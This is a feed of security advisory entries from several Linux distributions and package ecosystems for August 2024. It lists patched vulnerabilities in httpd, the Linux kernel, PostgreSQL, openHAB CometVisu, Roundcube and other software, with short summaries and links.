08.08.2024 22:01:17	almalinux	[ALSA-2024:5138] httpd security update (important)	httpd security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5138
08.08.2024 03:00:00	debian	[DSA-5742-1] odoo	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5742-1
08.08.2024 03:00:00	debian	[DSA-5744-1] thunderbird (critical)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5744-1
08.08.2024 03:00:00	debian	[DSA-5741-1] chromium (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5741-1
08.08.2024 03:00:00	debian	[DSA-5743-1] roundcube (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5743-1
08.08.2024 03:00:00	freebsd	[FREEBSD:48E6D514-5568-11EF-AF48-6CC21735F730] PostgreSQL -- Prevent unauthorized code execution during pg_dump (high)	PostgreSQL project reports: An attacker able to create and drop non-temporary objects could inject SQL code that would be executed by a concurrent pg_dump session with the privileges of the role running pg_dump (which is often a superuser). The attack involves replacing a sequence or similar object with a view or foreign table that will execute malicious code. To prevent this, introduce a new server parameter restrict_nonsystem_relation_kind that can disable expansion of non-builtin views as well as access to foreign tables, and teach pg_dump to set it when available. Note that the attack is prevented only if both pg_dump and the server it is dumping from are new enough to have this fix.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:48E6D514-5568-11EF-AF48-6CC21735F730
08.08.2024 03:00:00	redhat	[RHSA-2024:5138] httpd security update (important)	The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: Security issues via?backend applications whose response headers are malicious or exploitable (CVE-2024-38476)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:5138
08.08.2024 20:11:37	rustsec	[RUSTSEC-2024-0361] CWA-2024-004: Gas mispricing in cosmwasm-vm	Some Wasm operations take significantly more gas than our benchmarks indicated. This can lead to missing the gas target we defined by a factor of ~10x. This means a malicious contract could take 10 times as much time to execute as expected, which can be used to temporarily DoS a chain.For more information, see [CWA-2024-004](https://github.com/CosmWasm/advisories/blob/main/CWAs/CWA-2024-004.md).	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0361
08.08.2024 03:00:00	redhat	[RHSA-2024:5101] kernel security update (important)	The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: powerpc: Fix access beyond end of drmem array (CVE-2023-52451)* kernel: efivarfs: force RO when remounting if SetVariable is not supported (CVE-2023-52463)* kernel: tracing: Restructure trace_clock_global() to never block (CVE-2021-46939)* kernel: ext4: avoid online resizing failures due to oversized flex bg (CVE-2023-52622)* kernel: net/sched: flower: Fix chain template offload (CVE-2024-26669)* kernel: stmmac: Clear variable when destroying workqueue (CVE-2024-26802)* kernel: efi: runtime: Fix potential overflow of soft-reserved region size (CVE-2024-26843)* kernel: quota: Fix potential NULL pointer dereference (CVE-2024-26878)* kernel: TIPC message reassembly use-after-free remote code execution vulnerability (CVE-2024-36886)* kernel: SUNRPC: fix a memleak in gss_import_v2_context (CVE-2023-52653)* kernel: dmaengine/idxd: hardware erratum allows potential security problem with direct access by untrusted application (CVE-2024-21823)* kernel: Revert "net/mlx5: Block entering switchdev mode with ns inconsistency" (CVE-2023-52658)* kernel: ext4: fix corruption during on-line resize (CVE-2024-35807)* kernel: x86/fpu: Keep xfd_state in sync with MSR_IA32_XFD (CVE-2024-35801)* kernel: dyndbg: fix old BUG_ON in >control parser (CVE-2024-35947)* kernel: net/sched: act_skbmod: prevent kernel-infoleak (CVE-2024-35893)* kernel: x86/mce: Make sure to grab mce_sysfs_mutex in set_bank() (CVE-2024-35876)* kernel: platform/x86: wmi: Fix opening of char device (CVE-2023-52864)* kernel: tipc: Change nla_policy for bearer-related names to NLA_NUL_STRING (CVE-2023-52845)* (CVE-2023-28746)* (CVE-2023-52847)* (CVE-2021-47548)* (CVE-2024-36921)* (CVE-2024-26921)* (CVE-2021-47579)* (CVE-2024-36927)* (CVE-2024-39276)* (CVE-2024-33621)* (CVE-2024-27010)* (CVE-2024-26960)* (CVE-2024-38596)* (CVE-2022-48743)* (CVE-2024-26733)* (CVE-2024-26586)* (CVE-2024-26698)* (CVE-2023-52619)Bug Fix(es):* RHEL8.6 - Spinlock statistics may show negative elapsed time and incorrectly formatted output (JIRA:RHEL-17678)* [AWS][8.9]There are call traces found when booting debug-kernel for Amazon EC2 r8g.metal-24xl instance (JIRA:RHEL-23841)* [rhel8] gfs2: Fix glock shrinker (JIRA:RHEL-32941)* lan78xx: Microchip LAN7800 never comes up after unplug and replug (JIRA:RHEL-33437)* [Hyper-V][RHEL-8.10.z] Update hv_netvsc driver to TOT (JIRA:RHEL-39074)* Use-after-free on proc inode-i_sb triggered by fsnotify (JIRA:RHEL-40167)* blk-cgroup: Properly propagate the iostat update up the hierarchy [rhel-8.10.z] (JIRA:RHEL-40939)* (JIRA:RHEL-31798)* (JIRA:RHEL-10263)* (JIRA:RHEL-40901)* (JIRA:RHEL-43547)* (JIRA:RHEL-34876)Enhancement(s):* [RFE] Add module parameters 'soft_reboot_cmd' and 'soft_active_on_boot' for customizing softdog configuration (JIRA:RHEL-19723)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:5101
08.08.2024 03:00:00	redhat	[RHSA-2024:5102] kernel-rt security update (important)	The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.Security Fix(es):* kernel: efivarfs: force RO when remounting if SetVariable is not supported (CVE-2023-52463)* kernel: tracing: Restructure trace_clock_global() to never block (CVE-2021-46939)* kernel: ext4: avoid online resizing failures due to oversized flex bg (CVE-2023-52622)* kernel: net/sched: flower: Fix chain template offload (CVE-2024-26669)* kernel: stmmac: Clear variable when destroying workqueue (CVE-2024-26802)* kernel: efi: runtime: Fix potential overflow of soft-reserved region size (CVE-2024-26843)* kernel: quota: Fix potential NULL pointer dereference (CVE-2024-26878)* kernel: TIPC message reassembly use-after-free remote code execution vulnerability (CVE-2024-36886)* kernel: SUNRPC: fix a memleak in gss_import_v2_context (CVE-2023-52653)* kernel: dmaengine/idxd: hardware erratum allows potential security problem with direct access by untrusted application (CVE-2024-21823)* kernel: ext4: fix corruption during on-line resize (CVE-2024-35807)* kernel: x86/fpu: Keep xfd_state in sync with MSR_IA32_XFD (CVE-2024-35801)* kernel: dyndbg: fix old BUG_ON in >control parser (CVE-2024-35947)* kernel: net/sched: act_skbmod: prevent kernel-infoleak (CVE-2024-35893)* kernel: x86/mce: Make sure to grab mce_sysfs_mutex in set_bank() (CVE-2024-35876)* kernel: platform/x86: wmi: Fix opening of char device (CVE-2023-52864)* kernel: tipc: Change nla_policy for bearer-related names to NLA_NUL_STRING (CVE-2023-52845)* kernel: Revert "net/mlx5: Block entering switchdev mode with ns inconsistency" (CVE-2023-52658)* kernel: crash due to a missing check for leb_size (CVE-2024-25739)* kernel: tcp: make sure init the accept_queue's spinlocks once (CVE-2024-26614)* kernel: tcp: add sanity checks to rx zerocopy (CVE-2024-26640)* kernel: NFSv4.2: fix nfs4_listxattr kernel BUG at mm/usercopy.c:102 (CVE-2024-26870)* kernel: nfs: fix UAF in direct writes (CVE-2024-26958)* kernel: SUNRPC: fix some memleaks in gssx_dec_option_array (CVE-2024-27388)* kernel: wifi: iwlwifi: mvm: don't set the MFP flag for the GTK (CVE-2024-27434)* kernel: of: Fix double free in of_parse_phandle_with_args_map (CVE-2023-52679)* kernel: scsi: lpfc: Fix possible memory leak in lpfc_rcv_padisc() (CVE-2024-35930)* kernel: wifi: iwlwifi: mvm: rfi: fix potential response leaks (CVE-2024-35912)* kernel: block: prevent division by zero in blk_rq_stat_sum() (CVE-2024-35925)* kernel: wifi: ath11k: decrease MHI channel buffer length to 8KB (CVE-2024-35938)* kernel: wifi: cfg80211: check A-MSDU format more carefully (CVE-2024-35937)* kernel: wifi: rtw89: fix null pointer access when abort scan (CVE-2024-35946)* kernel: netfilter: nf_tables: honor table dormant flag from netdev release event path (CVE-2024-36005)* kernel: mm/hugetlb: fix missing hugetlb_lock for resv uncharge (CVE-2024-36000)* kernel: mlxsw: spectrum_acl_tcam: Fix incorrect list API usage (CVE-2024-36006)* kernel: net: ieee802154: fix null deref in parse dev addr (CVE-2021-47257)* kernel: mmc: sdio: fix possible resource leaks in some error paths (CVE-2023-52730)* kernel: wifi: ath11k: fix gtk offload status event locking (CVE-2023-52777)* (CVE-2023-52832)* (CVE-2023-52803)* (CVE-2023-52756)* (CVE-2023-52834)* (CVE-2023-52791)* (CVE-2023-52764)* (CVE-2021-47468)* (CVE-2021-47284)* (CVE-2024-36025)* (CVE-2024-36941)* (CVE-2024-36940)* (CVE-2024-36904)* (CVE-2024-36896)* (CVE-2024-36954)* (CVE-2024-36950)* (CVE-2024-38575)* (CVE-2024-36917)* (CVE-2024-36016)* (CVE-2023-52762)* (CVE-2024-27025)* (CVE-2021-47548)* (CVE-2023-52619)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:5102
08.08.2024 11:54:06	almalinux	[ALSA-2024:5079] libtiff security update (moderate)	libtiff security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5079
08.08.2024 19:38:01	npm	[NPM:GHSA-F83W-WQHC-CFP4] Matrix SDK for React's URL preview setting for a room is controllable by the homeserver (moderate)	### ImpactA malicious homeserver could manipulate a user's account data to cause the client to enable URL previews in end-to-end encrypted rooms, in which case any URLs in encrypted messages would be sent to the server.Even if the CVSS score would be 4.1 ([AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N&version=3.1)) the maintainer classifies this as High severity issue.### PatchesThis was patched in matrix-react-sdk 3.105.1.### WorkaroundsDeployments that trust their homeservers, as well as closed federations of trusted servers, are not affected.### ReferencesN/A.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-F83W-WQHC-CFP4
09.08.2024 21:24:15	maven	[MAVEN:GHSA-PCWP-26PW-J98W] CometVisu Backend for openHAB has a path traversal vulnerability (moderate)	openHAB's [CometVisuServlet](https://github.com/openhab/openhab-webui/blob/1c03c60f84388b9d7da0231df2d4ebb1e17d3fcf/bundles/org.openhab.ui.cometvisu/src/main/java/org/openhab/ui/cometvisu/internal/servlet/CometVisuServlet.java#L75) is susceptible to an unauthenticated path traversal vulnerability.Local files on the server can be requested via HTTP GET on the CometVisuServlet.This vulnerability was discovered with the help of CodeQL's [Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/java/java-path-injection/) query.## ImpactThis issue may lead to Information Disclosure.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PCWP-26PW-J98W
09.08.2024 21:24:08	maven	[MAVEN:GHSA-F729-58X4-GQGF] CometVisu Backend for openHAB affected by RCE through path traversal (critical)	CometVisu's file system endpoints don't require authentication and additionally the endpoint to update an existing file is susceptible to path traversal. This makes it possible for an attacker to overwrite existing files on the openHAB instance. If the overwritten file is a shell script that is executed at a later time this vulnerability can allow remote code execution by an attacker.This vulnerability was discovered with the help of CodeQL's [Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/java/java-path-injection/) query.## ImpactThis issue may lead up to Remote Code Execution (RCE).	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F729-58X4-GQGF
09.08.2024 21:21:23	maven	[MAVEN:GHSA-3G4C-HJHR-73RJ] CometVisu Backend for openHAB has a sensitive information disclosure vulnerability (moderate)	Several endpoints in the CometVisu add-on of openHAB don't require authentication. This makes it possible for unauthenticated attackers to modify or to steal sensitive data.## ImpactThis issue may lead to sensitive Information Disclosure.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3G4C-HJHR-73RJ
09.08.2024 21:21:08	maven	[MAVEN:GHSA-V7GR-MQPJ-WWH3] CometVisu Backend for openHAB affected by SSRF/XSS (high)	The [proxy endpoint](https://github.com/openhab/openhab-webui/blob/1c03c60f84388b9d7da0231df2d4ebb1e17d3fcf/bundles/org.openhab.ui.cometvisu/src/main/java/org/openhab/ui/cometvisu/internal/backend/rest/ProxyResource.java#L83) of openHAB's CometVisu add-on can be accessed without authentication. This proxy-feature can be exploited as Server-Side Request Forgery (SSRF) to induce GET HTTP requests to internal-only servers, in case openHAB is exposed in a non-private network.Furthermore, this proxy-feature can also be exploited as a Cross-Site Scripting (XSS) vulnerability, as an attacker is able to re-route a request to their server and return a page with malicious JavaScript code. Since the browser receives this data directly from the openHAB CometVisu UI, this JavaScript code will be executed with the origin of the CometVisu UI. This allows an attacker to exploit call endpoints on an openHAB server even if the openHAB server is located in a private network. (e.g. by sending an openHAB admin a link that proxies malicious JavaScript.)This vulnerability was discovered with the help of CodeQL's [Server-side request forgery](https://codeql.github.com/codeql-query-help/java/java-ssrf/) query.## ImpactThis issue may lead up to Remote Code Execution (RCE) when chained with other vulnerabilities (see: GHSL-2024-007).	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V7GR-MQPJ-WWH3
09.08.2024 16:38:06	ubuntu	[USN-6926-3] Linux kernel (Azure) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6926-3
10.08.2024 03:00:00	gentoo	[GLSA-202408-20] libde265: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in libde265, the worst of which could lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-20
10.08.2024 03:00:00	gentoo	[GLSA-202408-21] GPAC: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in GPAC, the worst of which could lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-21
10.08.2024 03:00:00	gentoo	[GLSA-202408-23] GnuPG: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in GnuPG, the worst of which could lead to signature spoofing.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-23
10.08.2024 03:00:00	gentoo	[GLSA-202408-22] Bundler: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in Bundler, the worst of which could lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-22
10.08.2024 03:00:00	freebsd	[FREEBSD:5776CC4F-5717-11EF-B611-84A93843EB75] Roundcube -- Multiple vulnerabilities (high)	The Roundcube project reports: XSS vulnerability in post-processing of sanitized HTML content [CVE-2024-42009] XSS vulnerability in serving of attachments other than HTML or SVG [CVE-2024-42008] information leak (access to remote content) via insufficient CSS filtering [CVE-2024-42010]	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:5776CC4F-5717-11EF-B611-84A93843EB75
11.08.2024 03:00:00	gentoo	[GLSA-202408-26] matio: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in matio, the worst of which could lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-26
11.08.2024 03:00:00	gentoo	[GLSA-202408-24] Ruby on Rails: Remote Code Execution (normal)	A vulnerability has been discovered in Ruby on Rails, which can lead to remote code execution via serialization of data.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-24
11.08.2024 03:00:00	gentoo	[GLSA-202408-25] runc: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in runc, the worst of which could lead to privilege escalation.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-25
11.08.2024 03:00:00	gentoo	[GLSA-202408-27] AFLplusplus: Arbitrary Code Execution (normal)	A vulnerability has been discovered in AFLplusplus, which can lead to arbitrary code execution via an untrusted CWD.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-27
11.08.2024 03:00:00	gentoo	[GLSA-202408-28] rsyslog: Heap Buffer Overflow (normal)	A vulnerability has been discovered in rsyslog, which could possibly lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-28
13.08.2024 10:46:09	fedora	[FEDORA-2024-01a020d192] Fedora 40: python3.6	Security fix for CVE-2024-6345 in the bundled setuptools wheel.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-01a020d192
13.08.2024 10:46:07	fedora	[FEDORA-2024-4c8a159e6e] Fedora 40: python2.7	Security fix for CVE-2024-6345 in the bundled setuptools wheel.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4c8a159e6e
13.08.2024 10:46:05	fedora	[FEDORA-2024-4b0d95b102] Fedora 40: pypy	Update to 7.3.16https://doc.pypy.org/en/latest/release-v7.3.16.html#changelogSecurity fix for CVE-2024-6345.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4b0d95b102
13.08.2024 04:35:40	fedora	[FEDORA-2024-f3692f8528] Fedora 39: microcode_ctl	Update to upstream 2.1-43. 20240531Addition of 06-aa-04/0xe6 (MTL-H/U C0) microcode at revision 0x1c;Addition of 06-ba-08/0xe0 microcode (in intel-ucode/06-ba-02) at revision0x4121;Addition of 06-ba-08/0xe0 microcode (in intel-ucode/06-ba-03) at revision0x4121;Addition of 06-ba-08/0xe0 microcode at revision 0x4121;Addition of 06-cf-01/0x87 (EMR-SP A0) microcode at revision 0x21000230;Addition of 06-cf-02/0x87 (EMR-SP A1) microcode (in intel-ucode/06-cf-01) atrevision 0x21000230;Addition of 06-cf-01/0x87 (EMR-SP A0) microcode (in intel-ucode/06-cf-02) atrevision 0x21000230;Addition of 06-cf-02/0x87 (EMR-SP A1) microcode at revision 0x21000230;Removal of 06-8f-04/0x10 microcode at revision 0x2c000290;Removal of 06-8f-04/0x87 (SPR-SP E0/S1) microcode at revision 0x2b0004d0;Removal of 06-8f-05/0x10 (SPR-HBM B1) microcode (in intel-ucode/06-8f-04) atrevision 0x2c000290;Removal of 06-8f-05/0x87 (SPR-SP E2) microcode (in intel-ucode/06-8f-04) atrevision 0x2b0004d0;Removal of 06-8f-06/0x10 microcode (in intel-ucode/06-8f-04) at revision0x2c000290;Removal of 06-8f-06/0x87 (SPR-SP E3) microcode (in intel-ucode/06-8f-04) atrevision 0x2b0004d0;Update of 06-55-03/0x97 (SKX-SP B1) microcode from revision 0x1000181 up to0x1000191;Update of 06-55-06/0xbf (CLX-SP B0) microcode from revision 0x4003604 up to0x4003605;Update of 06-55-07/0xbf (CLX-SP/W/X B1/L1) microcode from revision 0x5003604 upto 0x5003605;Update of 06-55-0b/0xbf (CPX-SP A1) microcode from revision 0x7002703 up to0x7002802;Update of 06-56-05/0x10 (BDX-NS A0/A1, HWL A1) microcode from revision 0xe000014up to 0xe000015;Update of 06-5f-01/0x01 (DNV B0) microcode from revision 0x38 up to 0x3e;Update of 06-6a-06/0x87 (ICX-SP D0) microcode from revision 0xd0003b9 up to0xd0003d1;Update of 06-6c-01/0x10 (ICL-D B0) microcode from revision 0x1000268 up to0x1000290;Update of 06-7a-01/0x01 (GLK B0) microcode from revision 0x3e up to 0x42;Update of 06-7a-08/0x01 (GLK-R R0) microcode from revision 0x22 up to 0x24;Update of 06-7e-05/0x80 (ICL-U/Y D1) microcode from revision 0xc2 up to 0xc4;Update of 06-8c-01/0x80 (TGL-UP3/UP4 B1) microcode from revision 0xb4 up to0xb6;Update of 06-8c-02/0xc2 (TGL-R C0) microcode from revision 0x34 up to 0x36;Update of 06-8d-01/0xc2 (TGL-H R0) microcode from revision 0x4e up to 0x50;Update of 06-8e-0c/0x94 (AML-Y 4+2 V0, CML-U 4+2 V0, WHL-U V0) microcode fromrevision 0xf8 up to 0xfa;Update of 06-8f-04/0x10 microcode (in intel-ucode/06-8f-05) from revision0x2c000290 up to 0x2c000390;Update of 06-8f-04/0x87 (SPR-SP E0/S1) microcode (in intel-ucode/06-8f-05) fromrevision 0x2b0004d0 up to 0x2b0005c0;Update of 06-8f-05/0x10 (SPR-HBM B1) microcode from revision 0x2c000290 up to0x2c000390;Update of 06-8f-05/0x87 (SPR-SP E2) microcode from revision 0x2b0004d0 up to0x2b0005c0;Update of 06-8f-06/0x10 microcode (in intel-ucode/06-8f-05) from revision0x2c000290 up to 0x2c000390;Update of 06-8f-06/0x87 (SPR-SP E3) microcode (in intel-ucode/06-8f-05) fromrevision 0x2b0004d0 up to 0x2b0005c0;Update of 06-8f-07/0x87 (SPR-SP E4/S2) microcode (in intel-ucode/06-8f-05) fromrevision 0x2b0004d0 up to 0x2b0005c0;Update of 06-8f-08/0x10 (SPR-HBM B3) microcode (in intel-ucode/06-8f-05) fromrevision 0x2c000290 up to 0x2c000390;Update of 06-8f-08/0x87 (SPR-SP E5/S3) microcode (in intel-ucode/06-8f-05) fromrevision 0x2b0004d0 up to 0x2b0005c0;Update of 06-8f-04/0x10 microcode (in intel-ucode/06-8f-06) from revision0x2c000290 up to 0x2c000390;Update of 06-8f-04/0x87 (SPR-SP E0/S1) microcode (in intel-ucode/06-8f-06) fromrevision 0x2b0004d0 up to 0x2b0005c0;Update of 06-8f-05/0x10 (SPR-HBM B1) microcode (in intel-ucode/06-8f-06) fromrevision 0x2c000290 up to 0x2c000390;Update of 06-8f-05/0x87 (SPR-SP E2) microcode (in intel-ucode/06-8f-06) fromrevision 0x2b0004d0 up to 0x2b0005c0;Update of 06-8f-06/0x10 microcode from revision 0x2c000290 up to 0x2c000390;Update of 06-8f-06/0x87 (SPR-SP E3) microcode from revision 0x2b0004d0 up to0x2b0005c0;Update of 06-8f-07/0x87 (SPR-SP E4/S2) microcode (in intel-ucode/06-8f-06) fromrevision 0x2b0004d0 up to 0x2b0005c0;Update of 06-8f-08/0x10 (SPR-HBM B3) microcode (in intel-ucode/06-8f-06) fromrevision 0x2c000290 up to 0x2c000390;Update of 06-8f-08/0x87 (SPR-SP E5/S3) microcode (in intel-ucode/06-8f-06) fromrevision 0x2b0004d0 up to 0x2b0005c0;Update of 06-8f-04/0x87 (SPR-SP E0/S1) microcode (in intel-ucode/06-8f-07) fromrevision 0x2b0004d0 up to 0x2b0005c0;Update of 06-8f-05/0x87 (SPR-SP E2) microcode (in intel-ucode/06-8f-07) fromrevision 0x2b0004d0 up to 0x2b0005c0;Update of 06-8f-06/0x87 (SPR-SP E3) microcode (in intel-ucode/06-8f-07) fromrevision 0x2b0004d0 up to 0x2b0005c0;Update of 06-8f-07/0x87 (SPR-SP E4/S2) microcode from revision 0x2b0004d0 up to0x2b0005c0;Update of 06-8f-08/0x87 (SPR-SP E5/S3) microcode (in intel-ucode/06-8f-07) fromrevision 0x2b0004d0 up to 0x2b0005c0;Update of 06-8f-04/0x10 microcode (in intel-ucode/06-8f-08) from revision0x2c000290 up to 0x2c000390;Update of 06-8f-04/0x87 (SPR-SP E0/S1) microcode (in intel-ucode/06-8f-08) fromrevision 0x2b0004d0 up to 0x2b0005c0;Update of 06-8f-05/0x10 (SPR-HBM B1) microcode (in intel-ucode/06-8f-08) fromrevision 0x2c000290 up to 0x2c000390;Update of 06-8f-05/0x87 (SPR-SP E2) microcode (in intel-ucode/06-8f-08) fromrevision 0x2b0004d0 up to 0x2b0005c0;Update of 06-8f-06/0x10 microcode (in intel-ucode/06-8f-08) from revision0x2c000290 up to 0x2c000390;Update of 06-8f-06/0x87 (SPR-SP E3) microcode (in intel-ucode/06-8f-08) fromrevision 0x2b0004d0 up to 0x2b0005c0;Update of 06-8f-07/0x87 (SPR-SP E4/S2) microcode (in intel-ucode/06-8f-08) fromrevision 0x2b0004d0 up to 0x2b0005c0;Update of 06-8f-08/0x10 (SPR-HBM B3) microcode from revision 0x2c000290 up to0x2c000390;Update of 06-8f-08/0x87 (SPR-SP E5/S3) microcode from revision 0x2b0004d0 up to0x2b0005c0;Update of 06-96-01/0x01 (EHL B1) microcode from revision 0x17 up to 0x19;Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode from revision 0x32 up to0x35;Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-97-02) fromrevision 0x32 up to 0x35;Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-97-02) fromrevision 0x32 up to 0x35;Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-97-02) fromrevision 0x32 up to 0x35;Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-97-05)from revision 0x32 up to 0x35;Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode from revision 0x32 up to 0x35;Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-97-05) fromrevision 0x32 up to 0x35;Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-97-05) fromrevision 0x32 up to 0x35;Update of 06-9a-03/0x80 (ADL-P 6+8/U 9W L0/R0) microcode from revision 0x430 upto 0x433;Update of 06-9a-04/0x80 (ADL-P 2+8 R0) microcode (in intel-ucode/06-9a-03) fromrevision 0x430 up to 0x433;Update of 06-9a-03/0x80 (ADL-P 6+8/U 9W L0/R0) microcode (in intel-ucode/06-9a-04) from revision 0x430 up to 0x433;Update of 06-9a-04/0x80 (ADL-P 2+8 R0) microcode from revision 0x430 up to0x433;Update of 06-9a-04/0x40 (AZB A0) microcode from revision 0x5 up to 0x7;Update of 06-9c-00/0x01 (JSL A0/A1) microcode from revision 0x24000024 up to0x24000026;Update of 06-9e-09/0x2a (KBL-G/H/S/X/Xeon E3 B0) microcode from revision 0xf4 upto 0xf8;Update of 06-9e-0a/0x22 (CFL-H/S/Xeon E U0) microcode from revision 0xf4 up to0xf6;Update of 06-9e-0c/0x22 (CFL-H/S/Xeon E P0) microcode from revision 0xf4 up to0xf6;Update of 06-9e-0d/0x22 (CFL-H/S/Xeon E R0) microcode from revision 0xfa up to0xfc;Update of 06-a5-02/0x20 (CML-H R1) microcode from revision 0xf8 up to 0xfa;Update of 06-a5-03/0x22 (CML-S 6+2 G1) microcode from revision 0xf8 up to 0xfa;Update of 06-a5-05/0x22 (CML-S 10+2 Q0) microcode from revision 0xf8 up to 0xfa;Update of 06-a6-00/0x80 (CML-U 6+2 A0) microcode from revision 0xf8 up to 0xfa;Update of 06-a6-01/0x80 (CML-U 6+2 v2 K1) microcode from revision 0xf8 up to0xfa;Update of 06-a7-01/0x02 (RKL-S B0) microcode from revision 0x5d up to 0x5e;Update of 06-b7-01/0x32 (RPL-S B0) microcode from revision 0x11d up to 0x123;Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode from revision 0x411c upto 0x4121;Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode (in intel-ucode/06-ba-02) fromrevision 0x411c up to 0x4121;Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode (in intel-ucode/06-ba-03)from revision 0x411c up to 0x4121;Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode from revision 0x411c up to0x4121;Update of 06-be-00/0x11 (ADL-N A0) microcode from revision 0x12 up to 0x17;Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-bf-02)from revision 0x32 up to 0x35;Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-bf-02) fromrevision 0x32 up to 0x35;Update of 06-bf-02/0x07 (ADL C0) microcode from revision 0x32 up to 0x35;Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-bf-02) fromrevision 0x32 up to 0x35;Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-bf-05)from revision 0x32 up to 0x35;Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-bf-05) fromrevision 0x32 up to 0x35;Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-bf-05) fromrevision 0x32 up to 0x35;Update of 06-bf-05/0x07 (ADL C0) microcode from revision 0x32 up to 0x35.Addresses CVE-2023-22655, CVE-2023-23583. CVE-2023-28746, CVE-2023-38575,CVE-2023-39368, CVE-2023-42667, CVE-2023-43490, CVE-2023-45733, CVE-2023-46103,CVE-2023-49141	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f3692f8528
13.08.2024 04:35:31	fedora	[FEDORA-2024-e27230c6c3] Fedora 39: python3.6	Security fix for CVE-2024-6345 in the bundled setuptools wheel.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e27230c6c3
13.08.2024 04:35:29	fedora	[FEDORA-2024-19f696f0ca] Fedora 39: python2.7	Security fix for CVE-2024-6345 in the bundled setuptools wheel.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-19f696f0ca
13.08.2024 04:35:28	fedora	[FEDORA-2024-c5152808e4] Fedora 39: pypy	Update to 7.3.16https://doc.pypy.org/en/latest/release-v7.3.16.html#changelogSecurity fix for CVE-2024-6345.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c5152808e4
